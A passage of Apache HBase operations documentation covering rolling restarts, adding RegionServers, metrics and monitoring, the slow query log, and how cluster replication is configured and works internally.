process, you may wish to manually do a rolling restart across your cluster.\nThis uses the `graceful-stop.sh` command <<decommission,decommission>>.\nIn this method, you can restart each RegionServer individually and then move its old regions back into place, retaining locality.\nIf you also need to restart the Master, you need to do it separately, and restart the Master before restarting the RegionServers using this method.\nThe following is an example of such a command.\nYou may need to tailor it to your environment.\nThis script does a rolling restart of RegionServers only.\nIt disables the load balancer before moving the regions.\n\n----\n\n$ for i in `cat conf\/regionservers|sort`; do .\/bin\/graceful_stop.sh --restart --reload --debug $i; done &> \/tmp\/log.txt &;\n----\n\nMonitor the output of the _\/tmp\/log.txt_ file to follow the progress of the script.\n\n==== Logic for Crafting Your Own Rolling Restart Script\n\nUse the following guidelines if you want to create your own rolling restart script.\n\n. Extract the new release, verify its configuration, and synchronize it to all nodes of your cluster using `rsync`, `scp`, or another secure synchronization mechanism.\n. Use the hbck utility to ensure that the cluster is consistent.\n+\n----\n\n$ .\/bin\/hbck\n----\n+\nPerform repairs if required.\nSee <<hbck,hbck>> for details.\n\n. Restart the master first.\n You may need to modify these commands if your new HBase directory is different from the old one, such as for an upgrade.\n+\n----\n\n$ .\/bin\/hbase-daemon.sh stop master; .\/bin\/hbase-daemon.sh start master\n----\n\n. Gracefully restart each RegionServer, using a script such as the following, from the Master.\n+\n----\n\n$ for i in `cat conf\/regionservers|sort`; do .\/bin\/graceful_stop.sh --restart --reload --debug $i; done &> \/tmp\/log.txt &\n----\n+\nIf you are running Thrift or REST servers, pass the --thrift or --rest options.\nFor other available options, run the `bin\/graceful-stop.sh --help` command.\n+\nIt is important to drain HBase regions slowly when restarting multiple RegionServers.\nOtherwise, multiple regions go offline simultaneously and must be reassigned to other nodes, which may also go offline soon.\nThis can negatively affect performance.\nYou can inject delays into the script above, for instance, by adding a Shell command such as `sleep`.\nTo wait for 5 minutes between each RegionServer restart, modify the above script to the following:\n+\n----\n\n$ for i in `cat conf\/regionservers|sort`; do .\/bin\/graceful_stop.sh --restart --reload --debug $i & sleep 5m; done &> \/tmp\/log.txt &\n----\n\n. Restart the Master again, to clear out the dead servers list and re-enable the load balancer.\n. Run the `hbck` utility again, to be sure the cluster is consistent.\n\n[[adding.new.node]]\n=== Adding a New Node\n\nAdding a new regionserver in HBase is essentially free, you simply start it like this: `$ .\/bin\/hbase-daemon.sh start regionserver` and it will register itself with the master.\nIdeally you also started a DataNode on the same machine so that the RS can eventually start to have local files.\nIf you rely on ssh to start your daemons, don't forget to add the new hostname in _conf\/regionservers_ on the master.\n\nAt this point the region server isn't serving data because no regions have moved to it yet.\nIf the balancer is enabled, it will start moving regions to the new RS.\nOn a small\/medium cluster this can have a very adverse effect on latency as a lot of regions will be offline at the same time.\nIt is thus recommended to disable the balancer the same way it's done when decommissioning a node and move the regions manually (or even better, using a script that moves them one by one).\n\nThe moved regions will all have 0% locality and won't have any blocks in cache so the region server will have to use the network to serve requests.\nApart from resulting in higher latency, it may also be able to use all of your network card's capacity.\nFor practical purposes, consider that a standard 1GigE NIC won't be able to read much more than _100MB\/s_.\nIn this case, or if you are in a OLAP environment and require having locality, then it is recommended to major compact the moved regions.\n\n[[hbase_metrics]]\n== HBase Metrics\n\nHBase emits metrics which adhere to the link:https:\/\/hadoop.apache.org\/docs\/stable\/hadoop-project-dist\/hadoop-common\/Metrics.html[Hadoop Metrics] API.\nStarting with HBase 0.95footnote:[The Metrics system was redone in\n HBase 0.96. See Migration\n to the New Metrics Hotness \u2013 Metrics2 by Elliot Clark for detail], HBase is configured to emit a default set of metrics with a default sampling period of every 10 seconds.\nYou can use HBase metrics in conjunction with Ganglia.\nYou can also filter which metrics are emitted and extend the metrics framework to capture custom metrics appropriate for your environment.\n\n=== Metric Setup\n\nFor HBase 0.95 and newer, HBase ships with a default metrics configuration, or [firstterm]_sink_.\nThis includes a wide variety of individual metrics, and emits them every 10 seconds by default.\nTo configure metrics for a given region server, edit the _conf\/hadoop-metrics2-hbase.properties_ file.\nRestart the region server for the changes to take effect.\n\nTo change the sampling rate for the default sink, edit the line beginning with `*.period`.\nTo filter which metrics are emitted or to extend the metrics framework, see https:\/\/hadoop.apache.org\/docs\/current\/api\/org\/apache\/hadoop\/metrics2\/package-summary.html\n\n.HBase Metrics and Ganglia\n[NOTE]\n====\nBy default, HBase emits a large number of metrics per region server.\nGanglia may have difficulty processing all these metrics.\nConsider increasing the capacity of the Ganglia server or reducing the number of metrics emitted by HBase.\nSee link:https:\/\/hadoop.apache.org\/docs\/current\/api\/org\/apache\/hadoop\/metrics2\/package-summary.html#filtering[Metrics Filtering].\n====\n\n=== Disabling Metrics\n\nTo disable metrics for a region server, edit the _conf\/hadoop-metrics2-hbase.properties_ file and comment out any uncommented lines.\nRestart the region server for the changes to take effect.\n\n[[discovering.available.metrics]]\n=== Discovering Available Metrics\n\nRather than listing each metric which HBase emits by default, you can browse through the available metrics, either as a JSON output or via JMX.\nDifferent metrics are exposed for the Master process and each region server process.\n\n.Procedure: Access a JSON Output of Available Metrics\n. After starting HBase, access the region server's web UI, at pass:[http:\/\/REGIONSERVER_HOSTNAME:60030] by default (or port 16030 in HBase 1.0+).\n. Click the [label]#Metrics Dump# link near the top.\n The metrics for the region server are presented as a dump of the JMX bean in JSON format.\n This will dump out all metrics names and their values.\n To include metrics descriptions in the listing -- this can be useful when you are exploring what is available -- add a query string of `?description=true` so your URL becomes pass:[http:\/\/REGIONSERVER_HOSTNAME:60030\/jmx?description=true].\n Not all beans and attributes have descriptions.\n. To view metrics for the Master, connect to the Master's web UI instead (defaults to pass:[http:\/\/localhost:60010] or port 16010 in HBase 1.0+) and click its [label]#Metrics\n Dump# link.\n To include metrics descriptions in the listing -- this can be useful when you are exploring what is available -- add a query string of `?description=true` so your URL becomes pass:[http:\/\/REGIONSERVER_HOSTNAME:60010\/jmx?description=true].\n Not all beans and attributes have descriptions.\n\n\nYou can use many different tools to view JMX content by browsing MBeans.\nThis procedure uses `jvisualvm`, which is an application usually available in the JDK.\n\n.Procedure: Browse the JMX Output of Available Metrics\n. Start HBase, if it is not already running.\n. Run the command `jvisualvm` command on a host with a GUI display.\n You can launch it from the command line or another method appropriate for your operating system.\n. Be sure the [label]#VisualVM-MBeans# plugin is installed. Browse to *Tools -> Plugins*. Click [label]#Installed# and check whether the plugin is listed.\n If not, click [label]#Available Plugins#, select it, and click btn:[Install].\n When finished, click btn:[Close].\n. To view details for a given HBase process, double-click the process in the [label]#Local# sub-tree in the left-hand panel.\n A detailed view opens in the right-hand panel.\n Click the [label]#MBeans# tab which appears as a tab in the top of the right-hand panel.\n. To access the HBase metrics, navigate to the appropriate sub-bean:\n.* Master:\n.* RegionServer:\n\n. The name of each metric and its current value is displayed in the [label]#Attributes# tab.\n For a view which includes more details, including the description of each attribute, click the [label]#Metadata# tab.\n\n=== Units of Measure for Metrics\n\nDifferent metrics are expressed in different units, as appropriate.\nOften, the unit of measure is in the name (as in the metric `shippedKBs`). Otherwise, use the following guidelines.\nWhen in doubt, you may need to examine the source for a given metric.\n\n* Metrics that refer to a point in time are usually expressed as a timestamp.\n* Metrics that refer to an age (such as `ageOfLastShippedOp`) are usually expressed in milliseconds.\n* Metrics that refer to memory sizes are in bytes.\n* Sizes of queues (such as `sizeOfLogQueue`) are expressed as the number of items in the queue.\n Determine the size by multiplying by the block size (default is 64 MB in HDFS).\n* Metrics that refer to things like the number of a given type of operations (such as `logEditsRead`) are expressed as an integer.\n\n[[master_metrics]]\n=== Most Important Master Metrics\n\nNote: Counts are usually over the last metrics reporting interval.\n\nhbase.master.numRegionServers::\n Number of live regionservers\n\nhbase.master.numDeadRegionServers::\n Number of dead regionservers\n\nhbase.master.ritCount ::\n The number of regions in transition\n\nhbase.master.ritCountOverThreshold::\n The number of regions that have been in transition longer than a threshold time (default: 60 seconds)\n\nhbase.master.ritOldestAge::\n The age of the longest region in transition, in milliseconds\n\n[[rs_metrics]]\n=== Most Important RegionServer Metrics\n\nNote: Counts are usually over the last metrics reporting interval.\n\nhbase.regionserver.regionCount::\n The number of regions hosted by the regionserver\n\nhbase.regionserver.storeFileCount::\n The number of store files on disk currently managed by the regionserver\n\nhbase.regionserver.storeFileSize::\n Aggregate size of the store files on disk\n\nhbase.regionserver.hlogFileCount::\n The number of write ahead logs not yet archived\n\nhbase.regionserver.totalRequestCount::\n The total number of requests received\n\nhbase.regionserver.readRequestCount::\n The number of read requests received\n\nhbase.regionserver.writeRequestCount::\n The number of write requests received\n\nhbase.regionserver.numOpenConnections::\n The number of open connections at the RPC layer\n\nhbase.regionserver.numActiveHandler::\n The number of RPC handlers actively servicing requests\n\nhbase.regionserver.numCallsInGeneralQueue::\n The number of currently enqueued user requests\n\nhbase.regionserver.numCallsInReplicationQueue::\n The number of currently enqueued operations received from replication\n\nhbase.regionserver.numCallsInPriorityQueue::\n The number of currently enqueued priority (internal housekeeping) requests\n\nhbase.regionserver.flushQueueLength::\n Current depth of the memstore flush queue.\n If increasing, we are falling behind with clearing memstores out to HDFS.\n\nhbase.regionserver.updatesBlockedTime::\n Number of milliseconds updates have been blocked so the memstore can be flushed\n\nhbase.regionserver.compactionQueueLength::\n Current depth of the compaction request queue.\n If increasing, we are falling behind with storefile compaction.\n\nhbase.regionserver.blockCacheHitCount::\n The number of block cache hits\n\nhbase.regionserver.blockCacheMissCount::\n The number of block cache misses\n\nhbase.regionserver.blockCacheExpressHitPercent ::\n The percent of the time that requests with the cache turned on hit the cache\n\nhbase.regionserver.percentFilesLocal::\n Percent of store file data that can be read from the local DataNode, 0-100\n\nhbase.regionserver.<op>_<measure>::\n Operation latencies, where <op> is one of Append, Delete, Mutate, Get, Replay, Increment; and where <measure> is one of min, max, mean, median, 75th_percentile, 95th_percentile, 99th_percentile\n\nhbase.regionserver.slow<op>Count ::\n The number of operations we thought were slow, where <op> is one of the list above\n\nhbase.regionserver.GcTimeMillis::\n Time spent in garbage collection, in milliseconds\n\nhbase.regionserver.GcTimeMillisParNew::\n Time spent in garbage collection of the young generation, in milliseconds\n\nhbase.regionserver.GcTimeMillisConcurrentMarkSweep::\n Time spent in garbage collection of the old generation, in milliseconds\n\nhbase.regionserver.authenticationSuccesses::\n Number of client connections where authentication succeeded\n\nhbase.regionserver.authenticationFailures::\n Number of client connection authentication failures\n\nhbase.regionserver.mutationsWithoutWALCount ::\n Count of writes submitted with a flag indicating they should bypass the write ahead log\n\n[[ops.monitoring]]\n== HBase Monitoring\n\n[[ops.monitoring.overview]]\n=== Overview\n\nThe following metrics are arguably the most important to monitor for each RegionServer for \"macro monitoring\", preferably with a system like link:http:\/\/opentsdb.net\/[OpenTSDB].\nIf your cluster is having performance issues it's likely that you'll see something unusual with this group.\n\nHBase::\n * See <<rs_metrics,rs metrics>>\n\nOS::\n * IO Wait\n * User CPU\n\nJava::\n * GC\n\nFor more information on HBase metrics, see <<hbase_metrics,hbase metrics>>.\n\n[[ops.slow.query]]\n=== Slow Query Log\n\nThe HBase slow query log consists of parseable JSON structures describing the properties of those client operations (Gets, Puts, Deletes, etc.) that either took too long to run, or produced too much output.\nThe thresholds for \"too long to run\" and \"too much output\" are configurable, as described below.\nThe output is produced inline in the main region server logs so that it is easy to discover further details from context with other logged events.\nIt is also prepended with identifying tags `(responseTooSlow)`, `(responseTooLarge)`, `(operationTooSlow)`, and `(operationTooLarge)` in order to enable easy filtering with grep, in case the user desires to see only slow queries.\n\n==== Configuration\n\nThere are two configuration knobs that can be used to adjust the thresholds for when queries are logged.\n\n* `hbase.ipc.warn.response.time` Maximum number of milliseconds that a query can be run without being logged.\n Defaults to 10000, or 10 seconds.\n Can be set to -1 to disable logging by time.\n* `hbase.ipc.warn.response.size` Maximum byte size of response that a query can return without being logged.\n Defaults to 100 megabytes.\n Can be set to -1 to disable logging by size.\n\n==== Metrics\n\nThe slow query log exposes to metrics to JMX.\n\n* `hadoop.regionserver_rpc_slowResponse` a global metric reflecting the durations of all responses that triggered logging.\n* `hadoop.regionserver_rpc_methodName.aboveOneSec` A metric reflecting the durations of all responses that lasted for more than one second.\n\n==== Output\n\nThe output is tagged with operation e.g. `(operationTooSlow)` if the call was a client operation, such as a Put, Get, or Delete, which we expose detailed fingerprint information for.\nIf not, it is tagged `(responseTooSlow)` and still produces parseable JSON output, but with less verbose information solely regarding its duration and size in the RPC itself. `TooLarge` is substituted for `TooSlow` if the response size triggered the logging, with `TooLarge` appearing even in the case that both size and duration triggered logging.\n\n==== Example\n\n\n[source]\n----\n2011-09-08 10:01:25,824 WARN org.apache.hadoop.ipc.HBaseServer: (operationTooSlow): {\"tables\":{\"riley2\":{\"puts\":[{\"totalColumns\":11,\"families\":{\"actions\":[{\"timestamp\":1315501284459,\"qualifier\":\"0\",\"vlen\":9667580},{\"timestamp\":1315501284459,\"qualifier\":\"1\",\"vlen\":10122412},{\"timestamp\":1315501284459,\"qualifier\":\"2\",\"vlen\":11104617},{\"timestamp\":1315501284459,\"qualifier\":\"3\",\"vlen\":13430635}]},\"row\":\"cfcd208495d565ef66e7dff9f98764da:0\"}],\"families\":[\"actions\"]}},\"processingtimems\":956,\"client\":\"10.47.34.63:33623\",\"starttimems\":1315501284456,\"queuetimems\":0,\"totalPuts\":1,\"class\":\"HRegionServer\",\"responsesize\":0,\"method\":\"multiPut\"}\n----\n\nNote that everything inside the \"tables\" structure is output produced by MultiPut's fingerprint, while the rest of the information is RPC-specific, such as processing time and client IP\/port.\nOther client operations follow the same pattern and the same general structure, with necessary differences due to the nature of the individual operations.\nIn the case that the call is not a client operation, that detailed fingerprint information will be completely absent.\n\nThis particular example, for example, would indicate that the likely cause of slowness is simply a very large (on the order of 100MB) multiput, as we can tell by the \"vlen,\" or value length, fields of each put in the multiPut.\n\n=== Block Cache Monitoring\n\nStarting with HBase 0.98, the HBase Web UI includes the ability to monitor and report on the performance of the block cache.\nTo view the block cache reports, click .\nFollowing are a few examples of the reporting capabilities.\n\n.Basic Info\nimage::bc_basic.png[]\n\n.Config\nimage::bc_config.png[]\n\n.Stats\nimage::bc_stats.png[]\n\n.L1 and L2\nimage::bc_l1.png[]\n\nThis is not an exhaustive list of all the screens and reports available.\nHave a look in the Web UI.\n\n== Cluster Replication\n\nNOTE: This information was previously available at\nlink:https:\/\/hbase.apache.org\/0.94\/replication.html[Cluster Replication].\n\nHBase provides a cluster replication mechanism which allows you to keep one cluster's state synchronized with that of another cluster, using the write-ahead log (WAL) of the source cluster to propagate the changes.\nSome use cases for cluster replication include:\n\n* Backup and disaster recovery\n* Data aggregation\n* Geographic data distribution\n* Online data ingestion combined with offline data analytics\n\nNOTE: Replication is enabled at the granularity of the column family.\nBefore enabling replication for a column family, create the table and all column families to be replicated, on the destination cluster.\n\n=== Replication Overview\n\nCluster replication uses a source-push methodology.\nAn HBase cluster can be a source (also called master or active, meaning that it is the originator of new data), a destination (also called slave or passive, meaning that it receives data via replication), or can fulfill both roles at once.\nReplication is asynchronous, and the goal of replication is eventual consistency.\nWhen the source receives an edit to a column family with replication enabled, that edit is propagated to all destination clusters using the WAL for that for that column family on the RegionServer managing the relevant region.\n\nWhen data is replicated from one cluster to another, the original source of the data is tracked via a cluster ID which is part of the metadata.\nIn HBase 0.96 and newer (link:https:\/\/issues.apache.org\/jira\/browse\/HBASE-7709[HBASE-7709]), all clusters which have already consumed the data are also tracked.\nThis prevents replication loops.\n\nThe WALs for each region server must be kept in HDFS as long as they are needed to replicate data to any slave cluster.\nEach region server reads from the oldest log it needs to replicate and keeps track of its progress processing WALs inside ZooKeeper to simplify failure recovery.\nThe position marker which indicates a slave cluster's progress, as well as the queue of WALs to process, may be different for every slave cluster.\n\nThe clusters participating in replication can be of different sizes.\nThe master cluster relies on randomization to attempt to balance the stream of replication on the slave clusters.\nIt is expected that the slave cluster has storage capacity to hold the replicated data, as well as any data it is responsible for ingesting.\nIf a slave cluster does run out of room, or is inaccessible for other reasons, it throws an error and the master retains the WAL and retries the replication at intervals.\n\n.Consistency Across Replicated Clusters\n[WARNING]\n====\nHow your application builds on top of the HBase API matters when replication is in play. HBase's replication system provides at-least-once delivery of client edits for an enabled column family to each configured destination cluster. In the event of failure to reach a given destination, the replication system will retry sending edits in a way that might repeat a given message. HBase provides two ways of replication, one is the original replication and the other is serial replication. In the previous way of replication, there is not a guaranteed order of delivery for client edits. In the event of a RegionServer failing, recovery of the replication queue happens independent of recovery of the individual regions that server was previously handling. This means that it is possible for the not-yet-replicated edits to be serviced by a RegionServer that is currently slower to replicate than the one that handles edits from after the failure.\n\nThe combination of these two properties (at-least-once delivery and the lack of message ordering) means that some destination clusters may end up in a different state if your application makes use of operations that are not idempotent, e.g. Increments.\n\nTo solve the problem, HBase now supports serial replication, which sends edits to destination cluster as the order of requests from client.\n====\n\n.Terminology Changes\n[NOTE]\n====\nPreviously, terms such as [firstterm]_master-master_, [firstterm]_master-slave_, and [firstterm]_cyclical_ were used to describe replication relationships in HBase.\nThese terms added confusion, and have been abandoned in favor of discussions about cluster topologies appropriate for different scenarios.\n====\n\n.Cluster Topologies\n* A central source cluster might propagate changes out to multiple destination clusters, for failover or due to geographic distribution.\n* A source cluster might push changes to a destination cluster, which might also push its own changes back to the original cluster.\n* Many different low-latency clusters might push changes to one centralized cluster for backup or resource-intensive data analytics jobs.\n The processed data might then be replicated back to the low-latency clusters.\n\nMultiple levels of replication may be chained together to suit your organization's needs.\nThe following diagram shows a hypothetical scenario.\nUse the arrows to follow the data paths.\n\n.Example of a Complex Cluster Replication Configuration\nimage::hbase_replication_diagram.jpg[]\n\nHBase replication borrows many concepts from the [firstterm]_statement-based replication_ design used by MySQL.\nInstead of SQL statements, entire WALEdits (consisting of multiple cell inserts coming from Put and Delete operations on the clients) are replicated in order to maintain atomicity.\n\n[[hbase.replication.management]]\n=== Managing and Configuring Cluster Replication\n.Cluster Configuration Overview\n\n. Configure and start the source and destination clusters.\n Create tables with the same names and column families on both the source and destination clusters, so that the destination cluster knows where to store data it will receive.\n. All hosts in the source and destination clusters should be reachable to each other.\n. If both clusters use the same ZooKeeper cluster, you must use a different `zookeeper.znode.parent`, because they cannot write in the same folder.\n. On the source cluster, in HBase Shell, add the destination cluster as a peer, using the `add_peer` command.\n. On the source cluster, in HBase Shell, enable the table replication, using the `enable_table_replication` command.\n. Check the logs to see if replication is taking place. If so, you will see messages like the following, coming from the ReplicationSource.\n----\nLOG.info(\"Replicating \"+clusterId + \" -> \" + peerClusterId);\n----\n\n.Serial Replication Configuration\nSee <<Serial Replication,Serial Replication>>\n\n.Cluster Management Commands\nadd_peer <ID> <CLUSTER_KEY>::\n Adds a replication relationship between two clusters. +\n * ID -- a unique string, which must not contain a hyphen.\n * CLUSTER_KEY: composed using the following template, with appropriate place-holders: `hbase.zookeeper.quorum:hbase.zookeeper.property.clientPort:zookeeper.znode.parent`\n * STATE(optional): ENABLED or DISABLED, default value is ENABLED\nlist_peers:: list all replication relationships known by this cluster\nenable_peer <ID>::\n Enable a previously-disabled replication relationship\ndisable_peer <ID>::\n Disable a replication relationship. HBase will no longer send edits to that\n peer cluster, but it still keeps track of all the new WALs that it will need\n to replicate if and when it is re-enabled. WALs are retained when enabling or disabling\n replication as long as peers exist.\nremove_peer <ID>::\n Disable and remove a replication relationship. HBase will no longer send edits to that peer cluster or keep track of WALs.\nenable_table_replication <TABLE_NAME>::\n Enable the table replication switch for all its column families. If the table is not found in the destination cluster then it will create one with the same name and column families.\ndisable_table_replication <TABLE_NAME>::\n Disable the table replication switch for all its column families.\n\n=== Serial Replication\n\nNote: this feature is introduced in HBase 1.5\n\n.Function of serial replication\n\nSerial replication supports to push logs to the destination cluster in the same order as logs reach to the source cluster.\n\n.Why need serial replication?\nIn replication of HBase, we push mutations to destination cluster by reading WAL in each region server. We have a queue for WAL files so we can read them in order of creation time. However, when region-move or RS failure occurs in source cluster, the hlog entries that are not pushed before region-move or RS-failure will be pushed by original RS(for region move) or another RS which takes over the remained hlog of dead RS(for RS failure), and the new entries for the same region(s) will be pushed by the RS which now serves the region(s), but they push the hlog entries of a same region concurrently without coordination.\n\nThis treatment can possibly lead to data inconsistency between source and destination clusters:\n\n1. there are put and then delete written to source cluster.\n\n2. due to region-move \/ RS-failure, they are pushed by different replication-source threads to peer cluster.\n\n3. if delete is pushed to peer cluster before put, and flush and major-compact occurs in peer cluster before put is pushed to peer cluster, the delete is collected and the put remains in peer cluster, but in source cluster the put is masked by the delete, hence data inconsistency between source and destination clusters.\n\n\n.Serial replication configuration\n\n. Set REPLICATION_SCOPE=>2 on the column family which is to be replicated serially when creating tables.\n\n REPLICATION_SCOPE is a column family level attribute. Its value can be 0, 1 or 2. Value 0 means replication is disabled, 1 means replication is enabled but which not guarantee log order, and 2 means serial replication is enabled.\n\n. This feature relies on zk-less assignment, and conflicts with distributed log replay, so users must set hbase.assignment.usezk=false and hbase.master.distributed.log.replay=false to support this feature.(Note that distributed log replay is deprecated and has already been purged from 2.0)\n\n.Limitations in serial replication\n\nNow we read and push logs in one RS to one peer in one thread, so if one log has not been pushed, all logs after it will be blocked. One wal file may contain wal edits from different tables, if one of the tables(or its CF) which REPLICATION_SCOPE is 2, and it is blocked, then all edits will be blocked, although other tables do not need serial replication. If you want to prevent this, then you need to split these tables\/cfs into different peers.\n\nMore details about serial replication can be found in link:https:\/\/issues.apache.org\/jira\/browse\/HBASE-9465[HBASE-9465].\n\n=== Verifying Replicated Data\n\nThe `VerifyReplication` MapReduce job, which is included in HBase, performs a systematic comparison of replicated data between two different clusters. Run the VerifyReplication job on the master cluster, supplying it with the peer ID and table name to use for validation. You can limit the verification further by specifying a time range or specific families. The job's short name is `verifyrep`. To run the job, use a command like the following:\n+\n[source,bash]\n----\n$ HADOOP_CLASSPATH=`${HBASE_HOME}\/bin\/hbase classpath` \"${HADOOP_HOME}\/bin\/hadoop\" jar \"${HBASE_HOME}\/hbase-server-VERSION.jar\" verifyrep --starttime=<timestamp> --endtime=<timestamp> --families=<myFam> <ID> <tableName>\n----\n+\nThe `VerifyReplication` command prints out `GOODROWS` and `BADROWS` counters to indicate rows that did and did not replicate correctly.\n\n=== Detailed Information About Cluster Replication\n\n.Replication Architecture Overview\nimage::replication_overview.png[]\n\n==== Life of a WAL Edit\n\nA single WAL edit goes through several steps in order to be replicated to a slave cluster.\n\n. An HBase client uses a Put or Delete operation to manipulate data in HBase.\n. The region server writes the request to the WAL in a way allows it to be replayed if it is not written successfully.\n. If the changed cell corresponds to a column family that is scoped for replication, the edit is added to the queue for replication.\n. In a separate thread, the edit is read from the log, as part of a batch process.\n Only the KeyValues that are eligible for replication are kept.\n Replicable KeyValues are part of a column family whose schema is scoped GLOBAL, are not part of a catalog such as `hbase:meta`, did not originate from the target slave cluster, and have not already been consumed by the target slave cluster.\n. The edit is tagged with the master's UUID and added to a buffer.\n When the buffer is filled, or the reader reaches the end of the file, the buffer is sent to a random region server on the slave cluster.\n. The region server reads the edits sequentially and separates them into buffers, one buffer per table.\n After all edits are read, each buffer is flushed using link:https:\/\/hbase.apache.org\/apidocs\/org\/apache\/hadoop\/hbase\/client\/Table.html[Table], HBase's normal client.\n The master's UUID and the UUIDs of slaves which have already consumed the data are preserved in the edits they are applied, in order to prevent replication loops.\n. In the master, the offset for the WAL that is currently being replicated is registered in ZooKeeper.\n\n. The first three steps, where the edit is inserted, are identical.\n. Again in a separate thread, the region server reads, filters, and edits the log edits in the same way as above.\n The slave region server does not answer the RPC call.\n. The master sleeps and tries again a configurable number of times.\n. If the slave region server is still not available, the master selects a new subset of region server to replicate to, and tries again to send the buffer of edits.\n. Meanwhile, the WALs are rolled and stored in a queue in ZooKeeper.\n Logs that are [firstterm]_archived_ by their region server, by moving them from the region server's log directory to a central log directory, will update their paths in the in-memory queue of the replicating thread.\n. When the slave cluster is finally available, the buffer is applied in the same way as during normal processing.\n The master region server will then replicate the backlog of logs that accumulated during the outage.\n\n.Spreading Queue Failover Load\nWhen replication is active, a subset of region servers in the source cluster is responsible for shipping edits to the sink.\nThis responsibility must be failed over like all other region server functions should a process or node crash.\nThe following configuration settings are recommended for maintaining an even distribution of replication activity over the remaining live servers in the source cluster:\n\n* Set `replication.source.maxretriesmultiplier` to `300`.\n* Set `replication.source.sleepforretries` to `1` (1 second). This value, combined with the value of `replication.source.maxretriesmultiplier`, causes the retry cycle to last about 5 minutes.\n* Set `replication.sleep.before.failover` to `30000` (30 seconds) in the source cluster site configuration.\n\n[[cluster.replication.preserving.tags]]\n.Preserving Tags During Replication\nBy default, the codec used for replication between clusters strips tags, such as cell-level ACLs, from cells.\nTo prevent the tags from being stripped, you can use a different codec which does not strip them.\nConfigure `hbase.replication.rpc.codec` to use `org.apache.hadoop.hbase.codec.KeyValueCodecWithTags`, on both the source and sink RegionServers involved in the replication.\nThis option was introduced in link:https:\/\/issues.apache.org\/jira\/browse\/HBASE-10322[HBASE-10322].\n\n==== Replication Internals\n\nReplication State in ZooKeeper::\n HBase replication maintains its state in ZooKeeper.\n By default, the state is contained in the base node _\/hbase\/replication_.\n This node contains two child nodes, the `Peers` znode and the `RS` znode.\n\nThe `Peers` Znode::\n The `peers` znode is stored in _\/hbase\/replication\/peers_ by default.\n It consists of a list of all peer replication clusters, along with the status of each of them.\n The value of each peer is its cluster key, which is provided in the HBase Shell.\n The cluster key contains a list of ZooKeeper nodes in the cluster's quorum, the client port for the ZooKeeper quorum, and the base znode for HBase in HDFS on that cluster.\n\nThe `RS` Znode::\n The `rs` znode contains a list of WAL logs which need to be replicated.\n This list is divided into a set of queues organized by region server and the peer cluster the region server is shipping the logs to.\n The rs znode has one child znode for each region server in the cluster.\n The child znode name is the region server's hostname, client port, and start code.\n This list includes both live and dead region servers.\n\n==== Choosing Region Servers to Replicate To\n\nWhen a master cluster region server initiates a replication source to a slave cluster, it first connects to the slave's ZooKeeper ensemble using the provided cluster key . It then scans the _rs\/_ directory to discover all the available sinks (region servers that are accepting incoming streams of edits to replicate) and randomly chooses a subset of them using a configured ratio which has a default value of 10%. For example, if a slave cluster has 150 machines, 15 will be chosen as potential recipient for edits that this master cluster region server sends.\nBecause this selection is performed by each master region server, the probability that all slave region servers are used is very high, and this method works for clusters of any size.\nFor example, a master cluster of 10 machines replicating to a slave cluster of 5 machines with a ratio of 10% causes the master cluster region servers to choose one machine each at random.\n\nA ZooKeeper watcher is placed on the _${zookeeper.znode.parent}\/rs_ node of the slave cluster by each of the master cluster's region servers.\nThis watch is used to monitor changes in the composition of the slave cluster.\nWhen nodes are removed from the slave cluster, or if nodes go down or come back up, the master cluster's region servers will respond by selecting a new pool of slave region servers to replicate to.\n\n==== Keeping Track of Logs\n\nEach master cluster region server has its own znode in the replication znodes hierarchy.\nIt contains one znode per peer cluster (if 5 slave clusters, 5 znodes are created), and each of these contain a queue of WALs to process.\nEach of these queues will track the WALs created by that region server, but they can differ in size.\nFor example, if one slave cluster becomes unavailable for some time, the WALs should not be deleted, so they need to stay in the queue while the others are processed.\nSee <<rs.failover.details,rs.failover.details>> for an example.\n\nWhen a source is instantiated, it contains the current WAL that the region server is writing to.\nDuring log rolling, the new file is added to the queue of each slave cluster's znode just before it is made available.\nThis ensures that all the sources are aware that a new log exists before the region server is able to append edits into it, but this operations is now more expensive.\nThe queue items are discarded when the replication thread cannot read more entries from a file (because it reached the end of the last block) and there are other files in the queue.\nThis means that if a source is up to date and replicates from the log that the region server writes to, reading up to the \"end\" of the current file will not delete the item in the queue.\n\nA log can be archived if it is no longer used or if the number of logs exceeds `hbase.regionserver.maxlogs` because the insertion rate is faster than regions are flushed.\nWhen a log is archived, the source threads are notified that the path for that log changed.\nIf a particular source has already finished with an archived log, it will just ignore the message.\nIf the log is in the queue, the path will be updated in memory.\nIf the log is currently being replicated, the change will be done atomically so that the reader doesn't attempt to open the file when has already been moved.\nBecause moving a file is a NameNode operation , if the reader is currently reading the log, it won't generate any exception.\n\n==== Reading, Filtering and Sending Edits\n\nBy default, a source attempts to read from a WAL and ship log entries to a sink as quickly as possible.\nSpeed is limited by the filtering of log entries Only KeyValues that are scoped GLOBAL and that do not belong to catalog tables will be retained.\nSpeed is also limited by total size of the list of edits to replicate per slave, which is limited to 64 MB by default.\nWith this configuration, a master cluster region server with three slaves would use at most 192 MB to store data to replicate.\nThis does not account for the data which was filtered but not garbage collected.\n\nOnce the maximum size of edits has been buffered or the reader reaches the end of the WAL, the source thread stops reading and chooses at random a sink to replicate to (from the list that was generated by keeping only a subset of slave region servers). It directly issues a RPC to the chosen region server and waits for the method to return.\nIf the RPC was successful, the source determines whether the current file has been emptied or it contains more data which needs to be read.\nIf the file has been emptied, the source deletes the znode in the queue.\nOtherwise, it registers the new offset in the log's znode.\nIf the RPC threw an exception, the source will retry 10 times before trying to find a different sink.\n\n==== Cleaning Logs\n\nIf replication is not enabled, the master's log-cleaning thread deletes old logs using a configured TTL.\nThis TTL-based method does not work well with replication, because archived logs which have exceeded their TTL may still be in a queue.\nThe default behavior is augmented so that if a log is past its TTL, the cleaning thread looks up every queue until it finds the log, while caching queues it has found.\nIf the log is not found in any queues, the log will be deleted.\nThe next time the cleaning process needs to look for a log, it starts by using its cached list.\n\nNOTE: WALs are saved when replication is enabled or disabled as long as peers exist.\n\n[[rs.failover.details]]\n==== Region Server Failover\n\nWhen no region servers are failing, keeping track of the logs in ZooKeeper adds no value.\nUnfortunately, region servers do fail, and since ZooKeeper is highly available, it is useful for managing the transfer of the queues in the event of a failure.\n\nEach of the master cluster region servers keeps a watcher on every other region server, in order to be notified when one dies (just as the master does). When a failure happens, they all race to create a znode called `lock` inside the dead region server's znode that contains its queues.\nThe region server that creates it successfully then transfers all the queues to its own znode, one at a time since ZooKeeper does not support renaming queues.\nAfter queues are all transferred, they are deleted from the old location.\nThe znodes that were recovered are renamed with the ID of the slave cluster appended with the name of the dead server.\n\nNext, the master cluster region server creates one new source thread per copied queue, and 